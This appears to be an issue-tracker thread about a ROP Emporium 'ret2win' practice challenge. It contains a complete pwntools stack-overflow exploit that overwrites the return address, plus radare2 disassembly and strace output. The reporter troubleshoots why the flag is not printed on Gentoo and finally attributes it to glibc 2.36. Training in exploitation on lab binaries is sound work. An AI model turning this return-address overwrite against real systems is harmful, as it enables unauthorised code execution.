The exploit I attached couldn't cat flag.txt, which is stored in the same directory as the binary. I tried running that script with strace and found this sus thing right where the program should cat flag.txt. /proc/pid/cwd exists when the program waits for input.

```
readlink("/proc/30556/cwd", 0x7ffcefe695a0, 4096) = -1 ENOENT (No such file or directory)
```

Function that cats flag.txt:

```
[0x7f4f566fa920]> pdf @ sym.ret2win
┌ 27: sym.ret2win ();
│ 0x00400756 55            push rbp
│ 0x00400757 4889e5        mov rbp, rsp
│ 0x0040075a bf26094000    mov edi, str.Well_done__Heres_your_flag: ; 0x400926 ; "Well done! Here's your flag:"
│ 0x0040075f e8ecfdffff    call sym.imp.puts ; int puts(const char *s)
│ 0x00400764 bf43094000    mov edi, str._bin_cat_flag.txt ; 0x400943 ; "/bin/cat flag.txt"
│ 0x00400769 e8f2fdffff    call sym.imp.system ; int system(const char *string)
│ 0x0040076e 90            nop
│ 0x0040076f 5d            pop rbp
└ 0x00400770 c3            ret
[0x7f4f566fa920]>
```

Screenshot of the issue: https://imgur.com/a/PB6uQkO

I've tried it on Kali, Arch, Debian and Ubuntu in the past. This is the first time I'm using Gentoo as a bin exploit lab.

Link to challenge: https://ropemporium.com/challenge/ret2win.html

Exploit I used:

```python
from pwn import *

context.arch = 'amd64'
context.log_level = "error"

exe = ELF("./ret2win")

# 40 bytes of buffer + saved rbp before the saved return address
offset = 40
# overwrite the saved return address with the address of ret2win()
payload = flat({
    offset: [
        p64(0x00400756)
    ]
})

io = process(exe.path)
io.sendlineafter(b"\n> ", payload)
print(io.recvallS())
```

kernel: 6.0.7
python: 3.10.8
full strace of exploit: https://jek1.co/pastes/strace.txt
1. I'm struggling to see how this would vary across distros at all unless kernel configuration, version, or sysctl toggles are different. 2. Please include a clear set of instructions to reproduce. 3. Please include a text version of the screenshot.
Just to add: it's not clear anything is actually wrong here with anything we're doing. Exploit development involves handling various edge cases and different behaviour on systems. While it's interesting that you supposedly see something different on Debian, that doesn't make it something that it's my role to fix. For all I know, you just need to adapt your code.
yea mb, those bins don't work with glibc 2.36